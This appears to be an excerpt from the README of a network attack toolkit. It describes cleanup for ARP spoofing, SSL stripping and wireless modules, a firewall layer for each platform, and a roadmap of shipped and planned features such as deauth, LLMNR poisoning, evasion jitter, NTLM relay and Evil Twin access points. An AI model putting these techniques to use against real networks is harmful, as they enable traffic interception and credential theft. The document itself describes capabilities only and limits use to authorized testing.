Always restore: Every attack module's start() has a finally block.
ARP: 5x genuine replies. SSL Strip: iptables removed. NDP: genuine NAs sent.
Wireless: managed mode restored. Ctrl+C is always safe.
Platform abstraction: core/platform_compat.get_firewall() returns
LinuxFirewall, MacOSFirewall, or WindowsFirewall based on platform.system().
All call await fw.enable_ip_forwarding() / await fw.restore() uniformly.
Structured concurrency: Python 3.11+ uses asyncio.TaskGroup. Python 3.10
falls back to asyncio.gather. All attack tasks share one Session object.
| Priority | Improvement | Status |
|---|---|---|
| ✅ Done | GitHub Actions CI (pytest + mypy) | Shipped v2.1 |
| ✅ Done | 802.11 deauth module | Shipped v2.1 |
| ✅ Done | macOS support (pf instead of iptables) | Shipped v2.1 |
| ✅ Done | LLMNR/NBT-NS poisoning module | Shipped v2.1 |
| ✅ Done | Docker image for portable deployment | Shipped v2.1 |
| ✅ Done | Coverage gate (≥80%) + badge in README | Shipped v2.1 |
| ✅ Done | Timing jitter option for evasion | Shipped v2.1 |
| 🟡 Medium | NTLM relay (forward captured NTLM authentication to another service instead of cracking it) | Planned v2.2 |
| 🟡 Medium | Evil Twin AP (hostapd + DHCP) | Planned v2.2 |
| 🟢 Low | DNS rebinding attack module | Planned v2.2 |
| 🟢 Low | PCAP export (Wireshark-compatible) | Planned v2.2 |
For authorized security testing, CTF competitions, and educational use only. Running these tools against networks or systems you do not own or have explicit written permission to test is illegal in most jurisdictions (CFAA, Computer Misuse Act, etc.).
The authors accept no liability for unauthorized use.